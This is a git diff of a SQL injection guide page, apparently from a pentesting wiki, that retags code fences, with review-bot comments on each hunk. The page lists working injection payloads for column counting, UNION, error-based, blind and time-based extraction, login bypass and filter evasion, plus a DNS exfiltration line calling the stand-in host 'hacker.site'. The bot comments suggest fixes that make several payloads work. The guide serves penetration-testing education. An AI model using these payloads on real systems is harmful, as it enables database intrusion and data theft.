GitBook: [master] 491 pages modified
This commit is contained in:
parent
cd106b9c33
commit
4f109e4e87
@ -154,7 +154,7 @@ Two methods are typically used for this purpose:

Keep incrementing the number until you get a False response. Even though GROUP BY and ORDER BY have different functionality in SQL, they both can be used in the exact same fashion to determine the number of columns in the query.

```text
```sql
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
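Review bot: the `#True` annotations on the three ORDER BY lines are also live MySQL comment syntax, so a reader who copies a line sends the annotation along with the payload; moving the expected result into the prose (or a separate column) avoids that, and the sentence should also state that `--+` only works because the `+` is URL-decoded to the whitespace that MySQL's `-- ` comment requires. The `text` to `sql` retag itself is fine.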
@ -162,7 +162,7 @@ Keep incrementing the number until you get a False response. Even though GROUP B
#-1' UNION SELECT 1,2,3--+ True
```

```text
```sql
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
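Review bot: `#-1' UNION SELECT 1,2,3--+ True` comments out the entire payload, whereas the neighbouring ORDER BY and GROUP BY lines put the marker after the payload as `#True`; for consistency, and so the UNION line is copyable, write it as `-1' UNION SELECT 1,2,3--+ #True`. The GROUP BY fence retag is fine.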
@ -174,7 +174,7 @@ Keep incrementing the number until you get a False response. Even though GROUP B

Select more and more null values until the query is correct:

```text
```sql
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
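Review bot: `-- - Not working` and `-- - Worked` place the annotation inside the comment terminator, which is harmless when pasted but is a third annotation style on one page (next to `#True` and the commented-out UNION line above); pick one style and use it throughout. The context line would also be clearer if it said what "not working" means in practice: the database returns a column-count mismatch error, while "worked" means the page renders normally.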
@ -186,7 +186,7 @@ _You should use `null`values as in some cases the type of the columns of both si

On the next examples we are going to retrieve the name of all the databases, the table name of a database, the column names of the table:

```text
```sql
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata

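Review bot: the `information_schema.schemata` payload is the only one in this section without a comment terminator, so whatever the application appends after the injection point is still part of the query; add `--+` or `#` as the other examples do. Two wording fixes in the context lines: a space is missing between `null` and `values`, and "On the next examples" should read "In the next examples".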
@ -204,7 +204,7 @@ _There is a different way to discover this data on every different database, but
If for some reason you **cannot** see the **output** of the **query** but you can **see the error messages**, you can make this error messages to **ex-filtrate** data from the database.
Following a similar flow as in the Union Based exploitation you could manage to dump the DB.

```text
```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
```

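Review bot: the `floor(rand()*2)` duplicate-key technique is probabilistic, and with only two source rows (`select 1 union select 2`) the duplicate entry error will sometimes not fire at all, so the text should tell the reader to repeat the request until the error containing `@@VERSION` appears. The inner `CONCAT(@@VERSION)` is redundant and can simply be `@@VERSION`. In the context lines, "this error messages" should be "these error messages" and "ex-filtrate" is normally spelled "exfiltrate".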
@ -213,7 +213,7 @@ Following a similar flow as in the Union Based exploitation you could manage to
In this case you cannot see the results of the query or the errors, but you can **distinguished** when the query **return** a **true** or a **false** response because there are different contents on the page.
In this case, you can abuse that behaviour to dump the database char by char:

```text
```sql
?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'
```

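Review bot: the boolean payload is not valid SQL as written: `AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables = 'A'` needs the subquery wrapped in parentheses and a `LIMIT 1` so it yields a single row, otherwise every guess fails with a syntax or "subquery returns more than 1 row" error and true and false can never be distinguished. In the context line, "distinguished" should be "distinguish" and "return" should be "returns".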
@ -221,7 +221,7 @@ In this case, you can abuse that behaviour to dump the database char by char:

This is the **same case as before** but instead of distinguish between a true/false response from the query you can **distinguish between** an **error** in the SQL query or not \(maybe because the HTTP server crashes\). Therefore, in this case you can force an SQLerror each time you guess correctly the char:

```text
```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
```

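Review bot: the `IF(1, ...)` condition is a constant, so the multi-row subquery is always evaluated and the error fires on every request regardless of the guessed character, which contradicts the context line ("force an SQL error each time you guess correctly the char"); the first argument of `IF` has to be the character comparison for the example to work as described. "SQLerror" in the context line also needs a space, and "instead of distinguish" should be "instead of distinguishing".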
@ -229,7 +229,7 @@ AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -

In this case there **isn't** any way to **distinguish** the **response** of the query based on the context of the page. But, you can make the page **take longer to load** if the guessed character is correct. We have already saw this technique in use before in order to [confirm a SQLi vuln](./#confirming-with-timing).

```text
```sql
1 and (select sleep(10) from users where SUBSTR(table_name,1,1) = 'A')#
```

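Review bot: `from users where SUBSTR(table_name,1,1) = 'A'` references `table_name`, which is not a column of `users`, so this query fails with an unknown-column error instead of sleeping; it should select from `information_schema.tables` like the neighbouring payloads, or compare a column that actually exists in `users`. The context line "We have already saw" should be "We have already seen".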
@ -243,7 +243,7 @@ You can use stacked queries to **execute multiple queries in succession**. Note

If **no-other** exploitation method **worked**, you may try to make the **database ex-filtrate** the info to an **external host** controlled by you. For example, via DNS queries:

```text
```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```

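Review bot: the `load_file` example omits its prerequisites: the `\\\\host\\share` UNC form only causes a DNS lookup when the database host resolves UNC paths (a MySQL server on Windows), and `load_file` must be permitted by the server's file-privilege settings; both belong in the sentence, together with a note that `hacker.site` is a placeholder for a domain whose DNS the tester controls. "no-other" does not need a hyphen.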
@ -270,13 +270,13 @@ List to try to bypass the login functionality:

When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.

```text
```sql
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```

Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`

```text
```sql
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b<EFBFBD>
```

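Review bot: both blocks in this hunk are PHP rather than SQL (`md5($password,true)` and `md5("ffifdyop", true)` are PHP calls), so `php` would be the more accurate fence tag than `sql`. The right-hand side of the second block has been mangled by rendering (`<5D><>` and `<EFBFBD>` are residue of the raw digest bytes); showing the digest as hex with the leading `'or'` bytes pointed out would survive any renderer. The context text should also name the root cause, string interpolation of the raw digest into the query, so the reader sees that a parameterised query or a hex-encoded digest removes the bypass.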
@ -284,7 +284,7 @@ Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.

### Hash Authentication Bypass

```text
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```

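Review bot: the hash in `UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'` is never explained; the section should state that it is the MD5 of a password the attacker picks and then types into the login form, and that the UNION's column count and order must match the application's real query (here assumed to be username, password hash). The fence retag is fine.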
@ -299,7 +299,7 @@ You should use as username each line of the list and as password always: _**Pass

IF ' is being scaped you can use %A8%27, and when ' gets scaped it will be created: 0xA80x5c0x27 \(_╘'_\)

```text
```sql
%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --
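Review bot: the context line should spell out the mechanism that `0xA8 0x5c 0x27` illustrates: the `0x5c` backslash inserted by escaping is consumed as the second byte of a two-byte character when the connection uses a multibyte charset, which leaves the `0x27` quote unescaped; the technique therefore only applies when such a charset is in use, and the text should say so. "scaped" should be "escaped" in both places, and the byte sequence reads better spaced as `0xA8 0x5C 0x27`.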
@ -318,7 +318,7 @@ print r.text

### Polyglot injection \(multicontext\)

```text
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```

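Review bot: the polyglot needs one sentence on which context each fragment covers: the leading `SLEEP(1)` for an unquoted numeric context, `/*' or SLEEP(1) or '` for a single-quoted string and `" or SLEEP(1) or "*/` for a double-quoted one, with the `/* */` pair swallowing whichever fragments do not apply. Separately, the context line `print r.text` is Python 2 only; `print(r.text)` runs on both Python 2 and 3.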
@ -344,7 +344,7 @@ More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideu

Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.

```text
```sql
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
```

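Review bot: `WAITFOR DELAY '0:0:5'` is Microsoft SQL Server syntax while the rest of the page's payloads are MySQL; the context line should name the dialect so readers do not try it against other engines, and could explain in the same sentence that `--%20-` is the URL-encoded `-- -` terminator. "SQLInjection" should be "SQL injection".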
@ -384,24 +384,24 @@ With this technique you can extract information creating only 1 account. It is i

Using **hex2dec** and **substr**:

```text
```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```

To get the text you can use:

```text
```python
__import__('binascii').unhexlify(hex(215573607263)[2:])
```

Using **hex** and **replace** \(and **substr**\):

```text
```sql
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

Full ascii uppercase and lowercase replace:
#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```

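Review bot: `substr(table_name,1,6)` is capped at six characters because `conv()` works at 64-bit precision, and the text should say so and note that the offset has to be advanced in steps of six to read the rest of the name. `__import__('binascii').unhexlify(hex(215573607263)[2:])` assumes `hex()` yields an even number of digits, which holds for ASCII data but not for a leading byte below 0x10; `n.to_bytes((n.bit_length() + 7) // 8, 'big')` avoids the `unhexlify` length requirement altogether. Moving `#Full ascii uppercase and lowercase replace:` inside the `sql` fence as a comment is good; the section still never explains what the `replace()` chain achieves, and one sentence on that would help.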
@ -411,8 +411,8 @@ Routed SQL injection is a situation where the injectable query is not the one wh

Example:

```text
Hex of: -1' union select login,password from users-- a
```sql
#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
```

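Review bot: turning `Hex of: ...` into a `#` comment inside the fence is the right call. The example still needs one sentence on why the inner payload is hex-encoded: the first query receives `0x2d31...` as a string literal without any quote character, and it is the second, routed query that receives the decoded `-1' union select login,password from users-- a` and executes it. It should also say that the outer `union select` must match the first query's column count.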
@ -420,7 +420,7 @@ Hex of: -1' union select login,password from users-- a

No Space \(%20\) - bypass using whitespace alternatives

```text
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
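Review bot: each of these three payloads ends in a bare `--`, and MySQL only treats `--` as a comment when whitespace follows it, so whether the terminator takes effect depends on what the application appends after the injection point; end them with an encoded separator as well (for example `%09--%09`) or use `#` as the other sections do. A line stating that these work because the parser accepts tab, CR and FF as token separators would explain why they defeat a filter that only strips `%20`.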
@ -431,13 +431,13 @@ No Space \(%20\) - bypass using whitespace alternatives

No Whitespace - bypass using comments

```text
```sql
?id=1/*comment*/and/**/1=1/**/--
```

No Whitespace - bypass using parenthesis

```text
```sql
?id=(1)and(1)=(1)--
```

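Review bot: `No Whitespace - bypass using comments` and `No Whitespace - bypass using parenthesis` are plain lines while the page's other sub-topics use `###` headings; making them headings keeps them in the outline. The same bare `--` terminator concern as in the whitespace-alternatives hunk applies to `?id=1/*comment*/and/**/1=1/**/--` and `?id=(1)and(1)=(1)--`. "parenthesis" should be "parentheses".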
@ -451,7 +451,7 @@ SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE

Blacklist using keywords - bypass using uppercase/lowercase

```text
```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
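Review bot: the three case variants only defeat a blacklist that matches case-sensitively, and the label should say so; the `UniOn Select ... fRoM` payload earlier on the page already relies on the same idea, so a cross-reference would avoid stating it twice. The `#` terminators here are consistent with the page's other MySQL examples, and the fence retag is fine.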
@ -471,7 +471,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())

{% embed url="https://github.com/m4ll0k/Atlas" caption="" %}

## Other GUIDES
## Other Guides

* [https://sqlwiki.netspi.com/](https://sqlwiki.netspi.com/)
* [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)

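Review bot: the heading case fix from `## Other GUIDES` to `## Other Guides` is good. `{% embed url="https://github.com/m4ll0k/Atlas" caption="" %}` has an empty caption; a short phrase saying what Atlas does and why it appears in the WAF-bypass section would give the link some context, since nothing around it does.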